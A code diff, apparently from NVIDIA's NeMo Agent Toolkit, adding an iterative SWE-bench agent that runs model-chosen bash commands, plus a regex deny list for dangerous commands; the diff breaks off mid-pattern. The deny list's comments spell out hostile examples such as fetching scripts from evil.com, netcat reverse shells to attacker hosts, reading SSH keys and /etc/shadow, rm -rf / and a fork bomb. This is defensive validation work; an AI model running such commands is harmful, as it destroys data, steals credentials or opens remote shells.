diff --git a/examples/evaluation_and_profiling/swe_bench/README.md b/examples/evaluation_and_profiling/swe_bench/README.md index 155cbcddbb..09efbf0d0e 100644 --- a/examples/evaluation_and_profiling/swe_bench/README.md +++ b/examples/evaluation_and_profiling/swe_bench/README.md @@ -159,6 +159,18 @@ That information is only used for evaluation. Using it can taint the predictor a These predictors are provided in this NeMo Agent Toolkit example: - `gold` - Uses the patch from the `SWEBenchInput` instance, bypassing problem-solving logic. See [predict_gold_stub.py](src/nat_swe_bench/predictors/predict_gold/predict_gold_stub.py) and configuration file `examples/evaluation_and_profiling/swe_bench/configs/config_gold.yml`. - `skeleton` - Skeleton code for creating a problem-solving workflow. This code can be copied to create a net-new predictor. See [predict_skeleton.py](src/nat_swe_bench/predictors/predict_skeleton/predict_skeleton.py) and configuration file `examples/evaluation_and_profiling/swe_bench/configs/config_skeleton.yml`. +- `iterative` - Iterative agent that solves problems by executing bash commands step-by-step, observing results, and generating patches. See [predict_iterative.py](src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py) and configuration file `examples/evaluation_and_profiling/swe_bench/configs/config_iterative.yml`. + +### Benchmark Context (January 2026) + +The iterative predictor achieves 70% success rate on SWE-bench Lite, which primarily reflects the capabilities of modern foundation models (Claude Sonnet 4.5, GPT-5.2) rather than framework-specific innovations. SWE-bench Lite is approaching saturation at 70-80% with simple agent architectures. + +**For evaluating framework improvements beyond task correctness, consider tracking:** +- **Efficiency metrics:** Tokens consumed, steps taken, cost per solution +- **Reliability metrics:** Success rate variance over multiple runs +- **Harder benchmarks:** SWE-bench Verified (currently ~35% SOTA, not saturated) or full SWE-bench dataset (2,294 problems) + +This positions the iterative predictor as a reference implementation demonstrating NeMo Agent toolkit's builder pattern and tool integration capabilities. ### Adding a net new predictor To add a new predictor: diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py index d6f5b60a67..7352d9ade7 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py @@ -16,31 +16,59 @@ import typing from pydantic import Discriminator +from pydantic import Field from pydantic import Tag from nat.data_models.common import BaseModelRegistryTag from nat.data_models.common import TypedBaseModel +from nat.data_models.component_ref import LLMRef from nat.data_models.function import FunctionBaseConfig class SweBenchPredictorBaseConfig(TypedBaseModel, BaseModelRegistryTag): + """Base configuration class for SWE-bench predictors.""" description: str = "Swe Bench Problem Solver" class SweBenchPredictorGoldConfig(SweBenchPredictorBaseConfig, name="gold"): + """Configuration for the gold predictor that uses the provided patch directly. + + Attributes: + verbose: Whether to enable verbose output for debugging. + """ verbose: bool = True class SweBenchPredictorSkeletonConfig(SweBenchPredictorBaseConfig, name="skeleton"): + """Configuration for the skeleton predictor template. + + Attributes: + verbose: Whether to enable verbose output for debugging. + """ verbose: bool = False +class SweBenchPredictorIterativeConfig(SweBenchPredictorBaseConfig, name="iterative"): + """Configuration for the iterative predictor that solves problems step-by-step. + + Attributes: + llm_name: Reference to the LLM to use for iterative problem solving. + step_limit: Maximum number of agent steps before termination. + timeout: Command execution timeout in seconds. + """ + llm_name: LLMRef = Field(description="LLM to use for iterative agent") + step_limit: int = Field(default=250, description="Maximum number of agent steps") + timeout: int = Field(default=60, description="Command execution timeout in seconds") -SweBenchPredictorConfig = typing.Annotated[typing.Annotated[SweBenchPredictorGoldConfig, - Tag(SweBenchPredictorGoldConfig.static_type())] - | typing.Annotated[SweBenchPredictorSkeletonConfig, - Tag(SweBenchPredictorSkeletonConfig.static_type())], - Discriminator(TypedBaseModel.discriminator)] - +SweBenchPredictorConfig = typing.Annotated[ + typing.Annotated[SweBenchPredictorGoldConfig, Tag(SweBenchPredictorGoldConfig.static_type())] + | typing.Annotated[SweBenchPredictorSkeletonConfig, Tag(SweBenchPredictorSkeletonConfig.static_type())] + | typing.Annotated[SweBenchPredictorIterativeConfig, Tag(SweBenchPredictorIterativeConfig.static_type())], + Discriminator(TypedBaseModel.discriminator)] class SweBenchWorkflowConfig(FunctionBaseConfig, name="swe_bench"): + """Configuration for the SWE-bench workflow. + + Attributes: + predictor: The predictor configuration (gold, skeleton, or iterative). + """ predictor: SweBenchPredictorConfig diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml new file mode 100644 index 0000000000..71101f98fa --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml @@ -0,0 +1,78 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +llms: + nim_llm: + _type: nim + model_name: nvidia/nemotron-3-nano-30b-a3b + temperature: 0.0 + max_tokens: 4096 + claude_sonnet_llm: + _type: litellm + model_name: anthropic/claude-sonnet-4-5-20250929 + temperature: 0.0 + api_key: "${ANTHROPIC_API_KEY}" + openai_llm: + _type: openai + model_name: gpt-5.2 + temperature: 0.0 + api_key: "${OPENAI_API_KEY}" + +workflow: + _type: swe_bench + predictor: + _type: iterative + llm_name: "openai_llm" # "nim_llm" or "claude_sonnet_llm" or "openai_llm" + step_limit: 100 # Overrides default (250) + timeout: 60 + +functions: + git_repo_tool: + _type: git_repo_tool + workspace_dir: "./.workspace" + cleanup_on_exit: true + +eval: + general: + output_dir: .tmp/nat/examples/evaluation_and_profiling/swe_bench/iterative/ + max_concurrency: 5 + dataset: + _type: parquet + file_path: hf://datasets/princeton-nlp/SWE-bench_Lite/data/test-00000-of-00001.parquet + id_key: instance_id + structure: + disable: true + filter: + allowlist: + field: + instance_id: + - sympy__sympy-20590 + # - sympy__sympy-21055 + # - sympy__sympy-11400 + # - astropy__astropy-12907 + # - django__django-15781 + # - astropy__astropy-6938 + # - django__django-11001 + # - mwaskom__seaborn-3010 + # - pallets__flask-4045 + # - psf__requests-1963 + + evaluators: + swe_bench: + _type: swe_bench + run_id: nat_iterative_1 + clean: true + + diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py new file mode 100644 index 0000000000..7faa3b0ca9 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. \ No newline at end of file diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py new file mode 100644 index 0000000000..bc8574f507 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -0,0 +1,601 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Iterative agent-based predictor for SWE-bench problems. + +This predictor implements a step-by-step approach where the agent: +1. Receives a problem statement +2. Executes bash commands iteratively +3. Observes results and adjusts strategy +4. Generates patch using git diff + +The iterative loop and prompts are inspired by mini-swe-agent, adapted for NeMo Agent Toolkit. +""" + +import asyncio +import json +import logging +import re +import subprocess +import time +from dataclasses import dataclass +from pathlib import Path + +from git.exc import GitCommandError +from langchain_core.messages import AIMessage +from langchain_core.messages import HumanMessage +from langchain_core.messages import SystemMessage +from rich.console import Console + +from nat.builder.builder import Builder +from nat.builder.framework_enum import LLMFrameworkEnum +from nat.data_models.swe_bench_model import SWEBenchInput +from nat_swe_bench.config import SweBenchWorkflowConfig +from nat_swe_bench.predictors.predict_abc import SweBenchPredictorBase +from nat_swe_bench.predictors.predict_iterative.shell_validation import validate_command +from nat_swe_bench.predictors.predictor_registry import register_predictor + +logger = logging.getLogger(__name__) + +console = Console(highlight=False) + + +class NonTerminatingException(Exception): + """Raised for conditions that can be handled by the agent.""" + + +class TerminatingException(Exception): + """Raised for conditions that terminate the agent.""" + + +class FormatError(NonTerminatingException): + """Raised when the LLM's output is not in the expected format.""" + + +class ExecutionTimeoutError(NonTerminatingException): + """Raised when the action execution timed out.""" + + +class Submitted(TerminatingException): + """Raised when the agent has finished its task.""" + + +class LimitsExceeded(TerminatingException): + """Raised when the agent has reached its step limit.""" + + +@dataclass +class IterativeAgentConfig: + """Configuration for the iterative agent.""" + step_limit: int = 250 + timeout: int = 60 + max_output_length: int = 10000 + + +class IterativeAgent: + """Iterative agent that executes commands step-by-step.""" + + # Timeout message template + _TIMEOUT_TEMPLATE = ( + "The last command {action} timed out and has been killed.\n" + "The output of the command was:\n \n{output}\n\n" + "Please try another command and make sure to avoid those requiring interactive input." + ) + + # Output truncation warning message + _OUTPUT_TRUNCATION_WARNING = ( + "\n\n" + "The output of your last command was too long.\n" + "Please try a different command that produces less output.\n" + "If you're looking at a file you can try use head, tail or sed to view a smaller number of lines selectively.\n" + "If you're using grep or find and it produced too much output, you can use a more selective search pattern.\n" + "If you really need to see something from the full command's output, you can redirect output to a file and then search in that file.\n" + "\n\n" + ) + + def __init__(self, llm, repo_path: Path, config: IterativeAgentConfig): + self.llm = llm + self.repo_path = repo_path + self.config = config + self.messages: list = [] + self.n_steps = 0 + self.total_input_tokens = 0 + self.total_output_tokens = 0 + + def add_message(self, role: str, content: str): + """Add a message to the conversation and print it for debugging. + + Args: + role: The role of the message sender. Must be one of: + "system", "user", "human", "assistant", or "ai". + content: The message content to add. + + Raises: + ValueError: If role is not a recognized value. + """ + if role == "system": + msg = SystemMessage(content=content) + self.messages.append(msg) + console.print(f"\n[bold blue]System[/bold blue] (step {self.n_steps}):\n", end="", highlight=False) + elif role in ("user", "human"): + msg = HumanMessage(content=content) + self.messages.append(msg) + console.print(f"\n[bold green]User[/bold green] (step {self.n_steps}):\n", end="", highlight=False) + elif role in ("assistant", "ai"): + msg = AIMessage(content=content) + self.messages.append(msg) + console.print(f"\n[bold red]Assistant[/bold red] (step {self.n_steps}):\n", end="", highlight=False) + else: + raise ValueError(f"Unknown role: {role}") + + # Print content + console.print(content, highlight=False, markup=False) + + def _build_prompts(self, task: str, repo_path: Path) -> tuple[str, str]: + """Build system and instance prompts customized for SWE-bench. + + Args: + task: The task description/PR description. + repo_path: Path to the repository being worked on. + + Returns: + A tuple of (system_prompt, instance_prompt) strings. + """ + # Convert Path to string for template usage + repo_path_str = str(repo_path) + + system_template = """You are a helpful assistant that can interact multiple times with a computer shell to solve programming tasks. +Your response must contain exactly ONE bash code block with ONE command (or commands connected with && or ||). + +Include a THOUGHT section before your command where you explain your reasoning process. +Format your response as shown in . + + +THOUGHT: Your reasoning and analysis here + +```bash +your_command_here +``` + + +Failure to follow these rules will cause your response to be rejected.""" + + instance_template = f""" +Consider the following PR description: +{task} + + + +# Task Instructions + +## Overview +You're a software engineer interacting continuously with a computer by submitting commands. +You'll be helping implement necessary changes to meet requirements in the PR description. +Your task is specifically to make changes to non-test files in the current directory in order to fix the issue described in the PR description in a way that is general and consistent with the codebase. + +IMPORTANT: This is an interactive process where you will think and issue ONE command, see its result, then think and issue your next command. + +For each response: +1. Include a THOUGHT section explaining your reasoning and what you're trying to accomplish +2. Provide exactly ONE bash command to execute + +## Important Boundaries +- MODIFY: Regular source code files in {repo_path_str} (this is the working directory for all your subsequent commands) +- DO NOT MODIFY: Tests, configuration files (pyproject.toml, setup.cfg, etc.) + +## Recommended Workflow +1. Analyze the codebase by finding and reading relevant files +2. Create a script to reproduce the issue +3. Edit the source code to resolve the issue +4. Verify your fix works by running your script again +5. Test edge cases to ensure your fix is robust +6. Clean up any temporary files you created (test scripts, plans, summaries, etc.) + +## Command Execution Rules +You are operating in an environment where +1. You write a single command +2. The system executes that command in a subshell +3. You see the result +4. You write your next command + +Each response should include: +1. A **THOUGHT** section where you explain your reasoning and plan +2. A single bash code block with your command + +Format your responses like this: + + +THOUGHT: Here I explain my reasoning process, analysis of the current situation, +and what I'm trying to accomplish with the command below. + +```bash +your_command_here +``` + + +Commands must be specified in a single bash code block: + +```bash +your_command_here +``` + +**CRITICAL REQUIREMENTS:** +- Your response SHOULD include a THOUGHT section explaining your reasoning +- Your response MUST include EXACTLY ONE bash code block +- This bash block MUST contain EXACTLY ONE command (or a set of commands connected with && or ||) +- If you include zero or multiple bash blocks, or no command at all, YOUR RESPONSE WILL FAIL +- Do NOT try to run multiple independent commands in separate blocks in one response +- Directory or environment variable changes are not persistent. Every action is executed in a new subshell. +- However, you can prefix any action with `MY_ENV_VAR=MY_VALUE cd /path/to/working/dir && ...` or write/load environment variables from files + +Example of a CORRECT response: + +THOUGHT: I need to understand the structure of the repository first. Let me check what files are in the current directory to get a better understanding of the codebase. + +```bash +ls -la +``` + + +Example of an INCORRECT response: + +THOUGHT: I need to examine the codebase and then look at a specific file. I'll run multiple commands to do this. + +```bash +ls -la +``` + +Now I'll read the file: + +```bash +cat file.txt +``` + + +If you need to run multiple commands, either: +1. Combine them in one block using && or || +```bash +command1 && command2 || echo "Error occurred" +``` + +2. Wait for the first command to complete, see its output, then issue the next command in your following response. + +## Environment Details +- You have a full Linux shell environment +- Always use non-interactive flags (-y, -f) for commands +- Avoid interactive tools like vi, nano, or any that require user input +- If a command isn't available, you can install it + +## Useful Command Examples + +### Create a new file: +```bash +cat <<'EOF' > newfile.py +import numpy as np +hello = "world" +print(hello) +EOF +``` + +### Edit files with sed: +```bash +# Replace all occurrences +sed -i 's/old_string/new_string/g' filename.py + +# Replace only first occurrence +sed -i 's/old_string/new_string/' filename.py + +# Replace first occurrence on line 1 +sed -i '1s/old_string/new_string/' filename.py + +# Replace all occurrences in lines 1-10 +sed -i '1,10s/old_string/new_string/g' filename.py +``` + +### View file content: +```bash +# View specific lines with numbers +nl -ba filename.py | sed -n '10,20p' +``` + +### Any other command you want to run +```bash +anything +``` + +## Submission +When you've completed your work (reading, editing, testing), and cannot make further progress +issue exactly the following command: + +```bash +echo COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached +``` + +This command will submit your work. +You cannot continue working (reading, editing, testing) in any way on this task after submitting. +""" + + return system_template, instance_template + + async def run(self, task: str) -> tuple[str, str]: + """Run the iterative agent loop until completion. + + Executes commands step-by-step, observing results and adjusting strategy + until the task is completed or limits are exceeded. + + Args: + task: The task description to solve. + + Returns: + A tuple of (exit_status, result) where exit_status is either + "Submitted" or "LimitsExceeded", and result is the patch or error message. + """ + system_template, instance_template = self._build_prompts(task, self.repo_path) + + self.messages = [] + self.add_message("system", system_template) + self.add_message("user", instance_template) + + start_time = time.perf_counter() + + while True: + try: + # Check limits + if 0 < self.config.step_limit <= self.n_steps: + raise LimitsExceeded(f"Reached step limit: {self.config.step_limit}") + + self.n_steps += 1 + + response = await self._query_llm() + observation = await self._execute_action(response) + + # Check if completed + if "COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT" in observation: + # Extract patch from git diff output + patch_lines = observation.split("\n", 1) + if len(patch_lines) > 1: + patch = patch_lines[1] + raise Submitted(patch) + raise Submitted(observation) + + self.add_message("user", f"Observation:\n{observation}") + + except NonTerminatingException as e: + # Recoverable errors: add error message and continue + self.add_message("user", str(e)) + except TerminatingException as e: + # Log summary and return + elapsed = time.perf_counter() - start_time + exit_status = type(e).__name__ + logger.info( + "\nAgent finished: steps=%d, tokens=%d/%d, time=%.1fs, status=%s", + self.n_steps, self.total_input_tokens, self.total_output_tokens, + elapsed, exit_status + ) + self.add_message("user", str(e)) + return exit_status, str(e) + + async def _query_llm(self) -> str: + """Query LLM and return response content. + + Returns: + The LLM response content as a string. + + Raises: + NonTerminatingException: If the LLM invocation fails. + """ + try: + response = await self.llm.ainvoke(self.messages) + content = response.content if hasattr(response, 'content') else str(response) + self.add_message("assistant", content) + + # Extract and accumulate token usage from response metadata + if hasattr(response, 'response_metadata'): + metadata = response.response_metadata + # OpenAI format + if 'token_usage' in metadata: + self.total_input_tokens += metadata['token_usage'].get('prompt_tokens', 0) + self.total_output_tokens += metadata['token_usage'].get('completion_tokens', 0) + # Anthropic format + elif 'usage' in metadata: + self.total_input_tokens += metadata['usage'].get('input_tokens', 0) + self.total_output_tokens += metadata['usage'].get('output_tokens', 0) + + return content + except Exception as e: + logger.error("LLM invocation failed: %s", e, exc_info=True) + raise NonTerminatingException(f"LLM call failed: {str(e)}") + + async def _execute_action(self, response: str) -> str: + """Parse action from response and execute it asynchronously. + + Args: + response: The LLM response containing a bash code block. + + Returns: + The command output including returncode. + + Raises: + FormatError: If the response doesn't contain exactly one bash block, + or if the command fails security validation. + ExecutionTimeoutError: If the command execution times out. + NonTerminatingException: If command execution fails unexpectedly. + """ + # Extract bash command from response + action_regex = r"```bash\s*\n(.*?)\n```" + matches = re.findall(action_regex, response, re.DOTALL) + if len(matches) != 1: + error_msg = f"Expected exactly one bash command, found {len(matches)}" + raise FormatError(error_msg) + + command = matches[0].strip() + + # Validate command for security before execution + is_valid, error_msg = validate_command(command) + if not is_valid: + raise FormatError(f"Command blocked for security: {error_msg}") + + # Execute command using asyncio.to_thread to avoid blocking + def run_cmd(): + """Synchronous command execution function.""" + return subprocess.run( + command, + shell=True, + cwd=str(self.repo_path), + timeout=self.config.timeout, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, # stderr redirected to stdout + text=True, + encoding="utf-8", + errors="replace", + check=False, # Don't raise on non-zero exit; we handle return codes manually + ) + + try: + result = await asyncio.to_thread(run_cmd) + + # stderr is automatically redirected to stdout via stderr=subprocess.STDOUT + output = result.stdout if result.stdout else "" + + # Include returncode in the output so agent know action success or fail + output = f"{result.returncode}\n{output}" + + # Truncate long outputs + max_length = self.config.max_output_length + if len(output) > max_length: + elided_chars = len(output) - max_length + head_tail_length = max_length // 2 + output = ( + f"{output[:head_tail_length]}\n" + f"\n{elided_chars} characters elided\n\n" + f"{output[-head_tail_length:]}" + ) + output = self._OUTPUT_TRUNCATION_WARNING + output + + return output + + except (TimeoutError, subprocess.TimeoutExpired) as e: + # Extract output from exception if available (only subprocess.TimeoutExpired has output attribute) + if isinstance(e, subprocess.TimeoutExpired) and hasattr(e, "output") and e.output: + output = e.output if isinstance(e.output, str) else e.output.decode("utf-8", errors="replace") + else: + output = "" + # Format timeout message using template + timeout_message = self._TIMEOUT_TEMPLATE.format( + action=command, + output=output + ) + raise ExecutionTimeoutError(timeout_message) + except Exception as e: + raise NonTerminatingException(f"Error executing command: {str(e)}") + + +@register_predictor("iterative") +class SweBenchPredictor(SweBenchPredictorBase): + """Iterative agent-based predictor for SWE-bench.""" + + def __init__(self, config: SweBenchWorkflowConfig, builder: Builder): + super().__init__(config, builder) + self.git_tool = None + + async def predict_fn(self, swebench_input: SWEBenchInput) -> str: + """Generate patch using iterative agent approach. + + Args: + swebench_input: The SWE-bench problem instance to solve. + + Returns: + The generated patch as a string, or an error message if failed. + """ + logger.info("Processing instance %s with iterative agent", swebench_input.instance_id) + + # Setup repository + if self.git_tool is None: + self.git_tool = await self.builder.get_tool( + "git_repo_tool", + wrapper_type=LLMFrameworkEnum.LANGCHAIN + ) + + repo_name = swebench_input.instance_id.rsplit('-', 1)[0] # eg. scikit-learn__scikit-learn-14520 + org, repo = repo_name.split('__') + repo_url = f"https://github.com/{org}/{repo}" + + # Setup repo with instance_id for workspace isolation + try: + repo_path_str = await self.git_tool.arun(json.dumps({ + "operation": "setup", + "repo_url": repo_url, + "base_commit": swebench_input.base_commit, + "instance_id": swebench_input.instance_id # Isolate workspace per instance + })) + repo_path = Path(repo_path_str) + logger.info("Repository setup at %s", repo_path) + except GitCommandError as e: + logger.error("Git operation failed: %s", e, exc_info=True) + return f"Error: Git operation failed - {e.stderr}" + except OSError as e: + logger.error("Filesystem error: %s", e, exc_info=True) + return f"Error: Workspace setup failed - {str(e)}" + except Exception as e: + logger.exception("Unexpected error during repo setup: %s", e) + return f"Error: Setup failed - {str(e)}" + + try: + # Get LLM + llm = await self.builder.get_llm( + self.config.predictor.llm_name, + wrapper_type=LLMFrameworkEnum.LANGCHAIN + ) + + # Build task description + task = self._build_task_description(swebench_input) + + # Create agent config + agent_config = IterativeAgentConfig( + step_limit=getattr(self.config.predictor, 'step_limit', 250), + timeout=getattr(self.config.predictor, 'timeout', 60) + ) + + # Run iterative agent + agent = IterativeAgent(llm, repo_path, agent_config) + exit_status, patch = await agent.run(task) + + if exit_status == "Submitted": + logger.info("Agent completed successfully with patch") + return patch + else: + logger.warning(f"Agent exited with status: {exit_status}, result: {patch[:200] if patch else 'None'}") + return f"Error: {exit_status} - {patch}" + + except Exception as e: + logger.exception(f"Error processing {swebench_input.instance_id}: {e}") + return f"Error: {str(e)}" + + def _build_task_description(self, swebench_input: SWEBenchInput) -> str: + """Build task description from SWE-bench input. + + Args: + swebench_input: The SWE-bench problem instance. + + Returns: + Combined task description with problem statement and hints. + """ + parts = [swebench_input.problem_statement] + if swebench_input.hints_text: + parts.append(f"\nAdditional Context:\n{swebench_input.hints_text}") + return "\n".join(parts) + + diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/shell_validation.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/shell_validation.py new file mode 100644 index 0000000000..1e7a70b5a5 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/shell_validation.py @@ -0,0 +1,205 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Shell command validation for security. + +This module provides pattern-based validation to block dangerous shell commands +and common bypass techniques that could be used to evade command filtering. +""" + +import re + +# Dangerous command patterns that should be blocked for security. +# Each tuple contains (compiled_regex, error_message). +DANGEROUS_PATTERNS: list[tuple[re.Pattern, str]] = [ + # ===== Destructive system commands ===== + # Examples: "rm -rf /", "rm -rf ~", "rm -fr /" + (re.compile(r'\brm\s+(-[^\s]*\s+)*[/~](\s|$)'), + "Deleting root or home directory is not allowed"), + + # Examples: "rm -rf ..", "rm -rf ../important" + (re.compile(r'\brm\s+(-[^\s]*\s+)*\.\.'), + "Deleting parent directory is not allowed"), + + # Examples: "rm -rf *", "rm -rf ./*" + (re.compile(r'\brm\s+(-[^\s]*\s+)*\*'), + "Wildcard deletion is not allowed"), + + # Examples: "> /dev/sda", "echo x > /dev/mem" (allows /dev/null) + (re.compile(r'>\s*/dev/(?!null)'), + "Writing to device files is not allowed"), + + # Examples: "mkfs.ext4 /dev/sda", "mkfs -t ext4 /dev/sda1" + (re.compile(r'\bmkfs\b'), + "Formatting disks is not allowed"), + + # Examples: "fdisk /dev/sda", "fdisk -l /dev/nvme0n1" + (re.compile(r'\bfdisk\b'), + "Disk partitioning is not allowed"), + + # Examples: "dd if=/dev/zero of=/dev/sda", "dd of=/dev/nvme0n1" + (re.compile(r'\bdd\s+.*\bof=/dev/'), + "Writing to devices with dd is not allowed"), + + # Examples: "dd if=/dev/sda of=disk.img" (reading sensitive disk data) + (re.compile(r'\bdd\s+.*\bif=/dev/'), + "Reading from devices with dd is not allowed"), + + # Fork bomb: :(){ :|:& };: + (re.compile(r':\(\)\s*\{\s*:\|:&\s*\}\s*;:'), + "Fork bomb detected"), + + # ===== Privilege escalation ===== + # Examples: "sudo rm -rf /", "echo pwd | sudo -S cmd", "/usr/bin/sudo cmd" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?sudo\b'), + "sudo is not allowed"), + + # Examples: "doas rm file", "/usr/bin/doas cmd" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?doas\b'), + "doas is not allowed"), + + # Examples: "pkexec rm file", "pkexec /bin/bash" + (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?pkexec\b'), + "pkexec is not allowed"), + + # Examples: "su root", "su - admin", "su -c 'command' user" + (re.compile(r'(?:^|[;&|`]\s*)su\s+(-[^\s]*\s+)*\w'), + "su is not allowed"), + + # Examples: "chmod 777 /", "chmod -R 0777 /var" + (re.compile(r'\bchmod\s+[0-7]*777\b'), + "Setting 777 permissions is not allowed"), + + # Examples: "chown root file", "chown root:root /etc/passwd" + (re.compile(r'\bchown\s+root\b'), + "Changing ownership to root is not allowed"), + + # ===== Sensitive file access ===== + # Examples: "cat /etc/shadow", "> /etc/passwd", "< /etc/sudoers" + (re.compile(r'[<>]\s*/etc/(?:passwd|shadow|sudoers)'), + "Accessing sensitive system files is not allowed"), + + # Examples: "cat ~/.ssh/id_rsa", "cat /home/user/.aws/credentials" + (re.compile(r'\bcat\s+.*/(?:\.ssh/|\.aws/|\.env\b)'), + "Reading sensitive credential files is not allowed"), + + # ===== Arbitrary code download and network exfiltration ===== + # Examples: "wget http://evil.com/malware.sh", "wget https://x.com/script" + (re.compile(r'\bwget\s+.*https?://'), + "Downloading from URLs with wget is not allowed"), + + # Examples: "curl http://evil.com/script.sh", "curl -O https://..." + (re.compile(r'\bcurl\s+.*https?://'), + "Downloading from URLs with curl is not allowed"), + + # Examples: "nc -e /bin/bash 10.0.0.1 4444", "ncat -e cmd attacker.com" + (re.compile(r'\b(?:nc|ncat|netcat)\b.*\s-[^\s]*e'), + "Netcat reverse shell is not allowed"), +] + + +# Shell metacharacter bypass patterns that could be used to evade command-based filtering. +# These detect attempts to chain, substitute, or obfuscate commands using shell features. +# Each tuple contains (compiled_regex, error_message). +BYPASS_PATTERNS: list[tuple[re.Pattern, str]] = [ + # ===== Command substitution ===== + # Attackers can use $() or backticks to dynamically construct blocked commands. + # Examples: "$(cat /etc/shadow)", "$(echo rm -rf /)", "`whoami`", "`sudo reboot`" + (re.compile(r'\$\([^)]+\)|`[^`]+`'), + "Command substitution ($() or backticks) is not allowed"), + + # ===== Piping to shell interpreters ===== + # Attackers can pipe malicious commands to shell interpreters to bypass direct command checks. + # Examples: "echo 'rm -rf /' | bash", "cat script.sh | sh", "curl url | python" + (re.compile(r'\|\s*(?:bash|sh|zsh|ksh|dash|fish|python[23]?|perl|ruby|node)\b'), + "Piping to shell interpreter is not allowed"), + + # ===== Base64 encoded command execution ===== + # Attackers can encode malicious commands in base64 to evade pattern matching. + # Examples: "echo 'cm0gLXJmIC8=' | base64 -d | bash", "base64 -d script.b64 | sh" + (re.compile(r'base64\s+(-d|--decode).*\|\s*(?:bash|sh|zsh|python|perl)'), + "Base64 decode to shell execution is not allowed"), + + # ===== Eval and exec execution ===== + # Eval/exec can execute arbitrary strings as commands, bypassing static analysis. + # Examples: "eval 'rm -rf /'", "eval $(cat cmd.txt)", "exec rm -rf /" + (re.compile(r'\b(?:eval|exec)\s+'), + "eval/exec command execution is not allowed"), + + # ===== Here-string/here-doc to interpreter ===== + # Attackers can use here-strings or here-docs to feed commands to interpreters. + # Examples: "bash <<< 'rm -rf /'", "python <<< 'import os; os.system(\"rm -rf /\")'" + (re.compile(r'(?:bash|sh|zsh|python[23]?|perl|ruby)\s*<<<'), + "Here-string to interpreter is not allowed"), + + # ===== Process substitution ===== + # Process substitution can be used to execute commands and feed output as files. + # Examples: "cat <(curl http://evil.com)", "diff <(cat /etc/shadow) <(cat /etc/passwd)" + (re.compile(r'<\([^)]+\)'), + "Process substitution is not allowed"), + + # ===== Hex/octal escape execution ===== + # Attackers can use printf with hex/octal escapes to construct commands. + # Examples: "printf '\x72\x6d' | bash", "echo $'\x73\x75\x64\x6f'" + (re.compile(r'printf\s+[\'"][^"\']*\\[xX][0-9a-fA-F].*\|\s*(?:bash|sh)'), + "Hex escape to shell execution is not allowed"), + + # ===== Environment variable command injection ===== + # Attackers can use env vars to smuggle commands. + # Examples: "CMD='rm -rf /' && $CMD", "export X='sudo reboot'; $X" + (re.compile(r'\$\{[^}]+\}.*\|\s*(?:bash|sh)|;\s*\$[A-Z_]+\s*$'), + 